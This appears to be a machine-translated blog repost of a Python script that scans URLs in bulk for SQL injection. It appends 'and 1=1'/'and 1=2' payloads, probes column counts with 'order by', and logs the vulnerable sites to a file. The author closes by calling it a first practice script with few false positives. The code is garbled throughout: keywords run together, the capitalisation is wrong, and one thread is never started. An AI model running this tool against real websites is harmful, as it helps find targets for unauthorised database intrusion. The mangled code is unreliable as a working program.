#-*-coding:utf-8-*-deflogo ():Print(" *** ") Print(" * * ") Print("Author: * *") Print("Screw *") Print(" ***** ") Print(" * ") Print(" * * ") Print("Blog: * *") Print(" *** ") Print("http://www.cnblogs.com/pojun/")#Run Environment python3.0 batch, build a Url.txt file in this directory to import the injection point. ImportThreadingImportRequestsi=0err='true'Exp=['and 1=1','and 1=2']chang=[]new_str=""#Judgment Injection Pointdefjudge (): forIinchRange (2): Request=url+Exp[i]Try: respons1=Len (requests.get (Request). Text)except: Print(U"the site has a WAF and the connection is reset! ") exit () Chang.append (respons1)if(chang[1]!=chang[0]):Print(U'site ======> presence injected!') field (URL)Else: Print(U'site =======> "no" presence injected!')#judgment Fielddeffield (Weburl): J=0 A1=""A2="" whileJ<30: J+=1if(j%2!=0): Request=weburl+"Order by"+Str (j)Try: A1=len (Requests.get (request,timeout=1). Text)except: Pass Else: Request=weburl+"Order by"+Str (j)Try: A2=len (Requests.get (request,timeout=1). Text)except: Print(U"the site has a WAF and the connection is reset! ") if(A1!=A2 andJ>1): Print(U"number of fields is ========================>", j-1) Break #BulkdefPiliang (): Str=open ('Url.txt', encoding="Utf-8"). Read () a=str.split ('\ n') Url_num=Len (a) forI1inchRange (url_num-1): Chang=[] Print(A[i1]) forI2inchRange (2): Request=a[i1]+Exp[i2]Try: respons1=len (Requests.get (request,timeout=1). Text)except: GlobalErr Err='false' Print(U"the site has a WAF and the connection is reset! ") Break iferr=='true': Chang.append (respons1)iferr=='true': if(chang[1]==chang[0]):Print(U'site ========> "no" presence injected!') Else: Print(U'site ========> presence injected!') #field (A[i1])new_str=a[i1]+'\ n'o=open ('Ture_sql.txt','a') O.write (NEW_STR) Err='true' Print(U'1. Batch injection, exist 1.txt of this catalogue 2. Single point injection, and determine the number of fields') ID=int (Input ("ID?:"))if(id==1): T1=threading. Thread (target=Piliang) T1.start () T1.join ()elif(id==2): URL=input ('URL:') judge () T2=threading. Thread (target=field,args=(URL,)) T2.join ()Else: Print(U"input Error! ") logo ()
This script is the first script to finish the Python practiced hand, so the structure is confusing, but the effect is good. Basically no false positives!
Python batch detection injection point script